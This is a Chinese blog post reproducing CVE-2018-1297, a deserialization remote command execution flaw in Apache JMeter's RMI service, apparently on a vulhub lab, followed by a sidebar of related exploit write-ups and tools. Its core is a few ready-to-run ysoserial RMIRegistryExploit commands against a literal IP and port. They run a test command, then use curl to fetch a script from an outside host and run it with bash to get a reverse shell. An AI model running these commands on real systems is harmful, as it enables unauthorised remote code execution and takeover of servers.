Jmeter RMI 反序列化命令执行漏洞(CVE-2018-1297)

于 2023-03-14 14:44:12 发布
阅读量719 收藏
点赞数
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/zzzzz1284/article/details/129527450
版权
ApacheJMeter的2.x和3.x版本存在反序列化漏洞,允许攻击者通过ysoserial工具执行任意命令。攻击者可以利用RMIRegistryExploit进行exploit,创建反弹shell,例如下载并执行远程脚本,从而对目标服务器造成潜在危害。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

原因

Apache JMeter是美国阿帕奇(Apache)软件基金会的一套使用Java语言编写的用于压力测试和性能测试的开源软件。其2.x版本和3.x版本中存在反序列化漏洞,攻击者可以利用该漏洞在目标服务器上执行任意命令。

复现

直接使用ysoserial即可进行利用: 

java -cp ysoserial-all.jar ysoserial.exploit.RMIRegistryExploit 101.43.191.94 1099 BeanShell1 'touch /tmp/success'

反弹shell

java -cp ysoserial-all.jar ysoserial.exploit.RMIRegistryExploit 101.43.191.94 1099 BeanShell1 'curl http://216.127.164.238:7890/1.txt -o /tmp/shell.sh'

java -cp ysoserial-all.jar ysoserial.exploit.RMIRegistryExploit 101.43.191.94 1099 BeanShell1 '/bin/bash /tmp/shell.sh'

n1ght_X
关注
漏洞复现】Jmeter RMI反序列化命令执行
Fly_鹏程万里
10-08 251
Apache JMeter是美国阿帕奇(Apache)软件基金会的一套使用Java语言编写的用于压力测试和性能测试的开源软件,其2.x版本和3.x版本中存在反序列化漏洞,攻击者可以利用该漏洞在目标服务器上执行任意命令。
利用Vulnhub复现漏洞 - Jmeter RMI 反序列化命令执行漏洞CVE-2018-1297
JiangBuLiu的博客
07-11 2553
Jmeter RMI 反序列化命令执行漏洞CVE-2018-1297)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现利用ysoserial检查结果 Vulnhub官方复现教程 https://vulhub.org/#/environments/jmeter/CVE-2018-1297/ 漏洞原理 Apache JMeter是美国阿帕奇(Apache)软件基金会的一套使用Java语言编...
Jmeter RMI 反序列化命令执行漏洞
m0_63241485的博客
08-26 1017
ysoserial是一款在Github开源的知名java 反序列化利用工具,里面集合了各种java反序列化payload;由于其中部分payload使用到的低版本JDK中的类,所以建议使用低版本JDK .
Jmeter RMI 反序列化命令执行漏洞复现
Tauil的博客
08-02 979
针对目标主机地址及端口的RMI Registry建立远程连接(RMI—使用Java远程消息交换协议JRMP(Java Remote Messaging Protocol)进行通信),连接成功后提交执行用户选择的 payload。可以看到,环境开启后将启动RMI服务并监听1099端口,我们只需要使用ysoserial.exploit.RMIRegistryExploit即可执行任意命令。靶场:vulhub—jmeter/CVE-2018-1297/根据输入命令转化为对应序列化内容,然后将消息发送。...
GIT-SHELL 沙盒绕过(CVE-2017-8386)
黑白的博客
12-23 1131
声明 好好学习,天天向上 漏洞描述 GIT-SHELL 沙盒绕过(CVE-2017-8386)导致任意文件读取、可能的任意命令执行漏洞。 影响范围 复现过程 使用vulhub /app/vulhub-master/git/CVE-2017-8386 使用docker启动 docker-compose build docker-compose up -d 先准备好id_rsa,这是ssh的私钥,作者已经帮我们准备好了,就在docker-compose文件一起的文件夹内,拷贝到kali中,执行下述命令 ch
Apache JMeter rmi 反序列化 cve-2018-1297
whatday的专栏
08-07 564
漏洞描述 Severity: Important Vendor: The Apache Software Foundation Versions Affected: JMeter 2.X, 3.X Description [0]: When using Distributed Test only (RMI based), jmeter uses an unsecured RMI connection. This could allow an attacker to get Access to JM
rmi远程反序列化rce漏洞_[原创]CVE-2018-1297jmeter_RMI漏洞复现
weixin_31423955的博客
12-23 533
jmeter_RMI_CVE-2018-1297复现5ecurity团队(5ecurity.cn)成员 zzw(zzw@5ecurity.cn)原创发布
javaRMI反序列化漏洞验证工具
08-21
检测javaRMI反序列化漏洞
java_rmi漏洞利用工具
05-31
本项目使用socket直接发送数据包来攻击rmi,通过反序列化攻击rmi,双击直接运行,对1099端口的rmi服务直接进行漏洞检测。
java反序列化漏洞利用工具WebLogicExploit
01-14
使用注意: 1. WebLogic反弹需要等5秒左右 2. 该工具为对外测试版,请尽量按照正常思路来用,比如Url填写清楚,IP地址写对了,报错或者抛异常神马的别怪我,调输入校验好蛋疼。 本工具与网上已公布工具优点: 1. 综合实现网上公布的代码执行、反弹 2. jboss利用里添加一键getshell功能,利用的是jboss的热部署功能,直接部署一个war包,一键返回一个菜刀shell 3. 反弹shell部分更完美,不再加载远程war包,直接发包完成反弹。 4. jboss回显执行命令部分利用异常抛出机制,本地(4.2.3.GA)测试成功,其他版本请自测 5. 体积更小,不再依赖java环境,但程序采用.net编写,需要.net 4.0环境 待完成: weblogic回显结果测试中,稍后加入
java RMI客户端调用远程服务器系统命令
04-06
NULL 博文链接:https://skyandcity.iteye.com/blog/1547028
rmi远程代码执行漏洞_WebSphere 远程代码执行漏洞CVE20204450
weixin_39820173的博客
01-05 855
漏洞名称:WebSphere 远程代码执行漏洞CVE-2020-4450威胁等级:高危影响范围:WebSphere Application Server 9.0.0.0 - 9.0.5.4WebSphere Application Server 8.5.0.0 - 8.5.5.17漏洞类型:远程代码执行利用难度:中等漏洞分析1 WebSphere 组件介绍WebSphere 是 IB...
rmi远程代码执行漏洞_CVE-2019-19781 远程代码执行漏洞深入分析
weixin_39912580的博客
12-22 351
环境搭建然后选择下载NSVPX-ESX-13.0-47.22_nc_64.zip这个文件,该文件是ovf,可以直接用vmware来倒入并打开选择导入先后配置 IP地址,子网掩码,的网关地址,然后选择4确认默认用户名密码都是 nsroot然后访问之前设置的IP地址,出现以下界面则环境搭建成功漏洞复现使用方式输入要执行的命令漏洞复现成功漏洞分析首先查看我们的请求路径,由于利用了目录遍历漏洞,所以访问的...
rmi 反序列化漏洞_[漏洞分析]CVE201917564/Apache Dubbo存在反序列化漏洞
weixin_29284885的博客
01-07 267
漏洞描述Apache Dubbo支持多种协议,官方推荐使用Dubbo协议.Apache Dubbo HTTP协议中的一个反序列化漏洞(CVE-2019-17564),该漏洞的主要原因在于当Apache Dubbo启用HTTP协议之后,Apache Dubbo对消息体处理不当导致不安全反序列化,当项目包中存在可用的gadgets时即可导致远程代码执行.CVE编号CVE-2020-17564...
RMI反序列漏洞复现-——手把手光速复现,工具超全
weixin_37771454的博客
03-24 3689
RMI反序列漏洞复现-手把手光速复现,工具超全一、靶机部署:二、本机怎样查看是不是可以回显?三、attackRMI利用 RMI是REMOTE METHOD INVOCATION的简称,是J2SE的一部分,能够让程序员开发出基于JAVA的分布式应用。一个RMI对象是一个远程JAVA对象,可以从另一个JAVA虚拟机上(甚至跨过网络)调用它的方法,可以像调用本地JAVA对象的方法一样调用远程对象的方法,...
RMI执行过程
weixin_43460070的博客
07-20 281
RMI 是Java编程语言里一种用于实现远程过程调用的应用程序编程接口。它使客户机上的运行的程序可以调用远程服务器上的对象。远程方法调用特性使Java编程人员能够在网络环境中分布操作。RMI全部的宗旨就是尽可能地简化远程接口对象的使用,简而言之就是为了调用远程方法。https://blog.youkuaiyun.com/u012291108/article/details/52863915 这个过程中涉及到对象的传输,所以会用到序列化和反序列化,以及JNDI(远程方法调用协议) 参考文章: rmi详解:https://
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值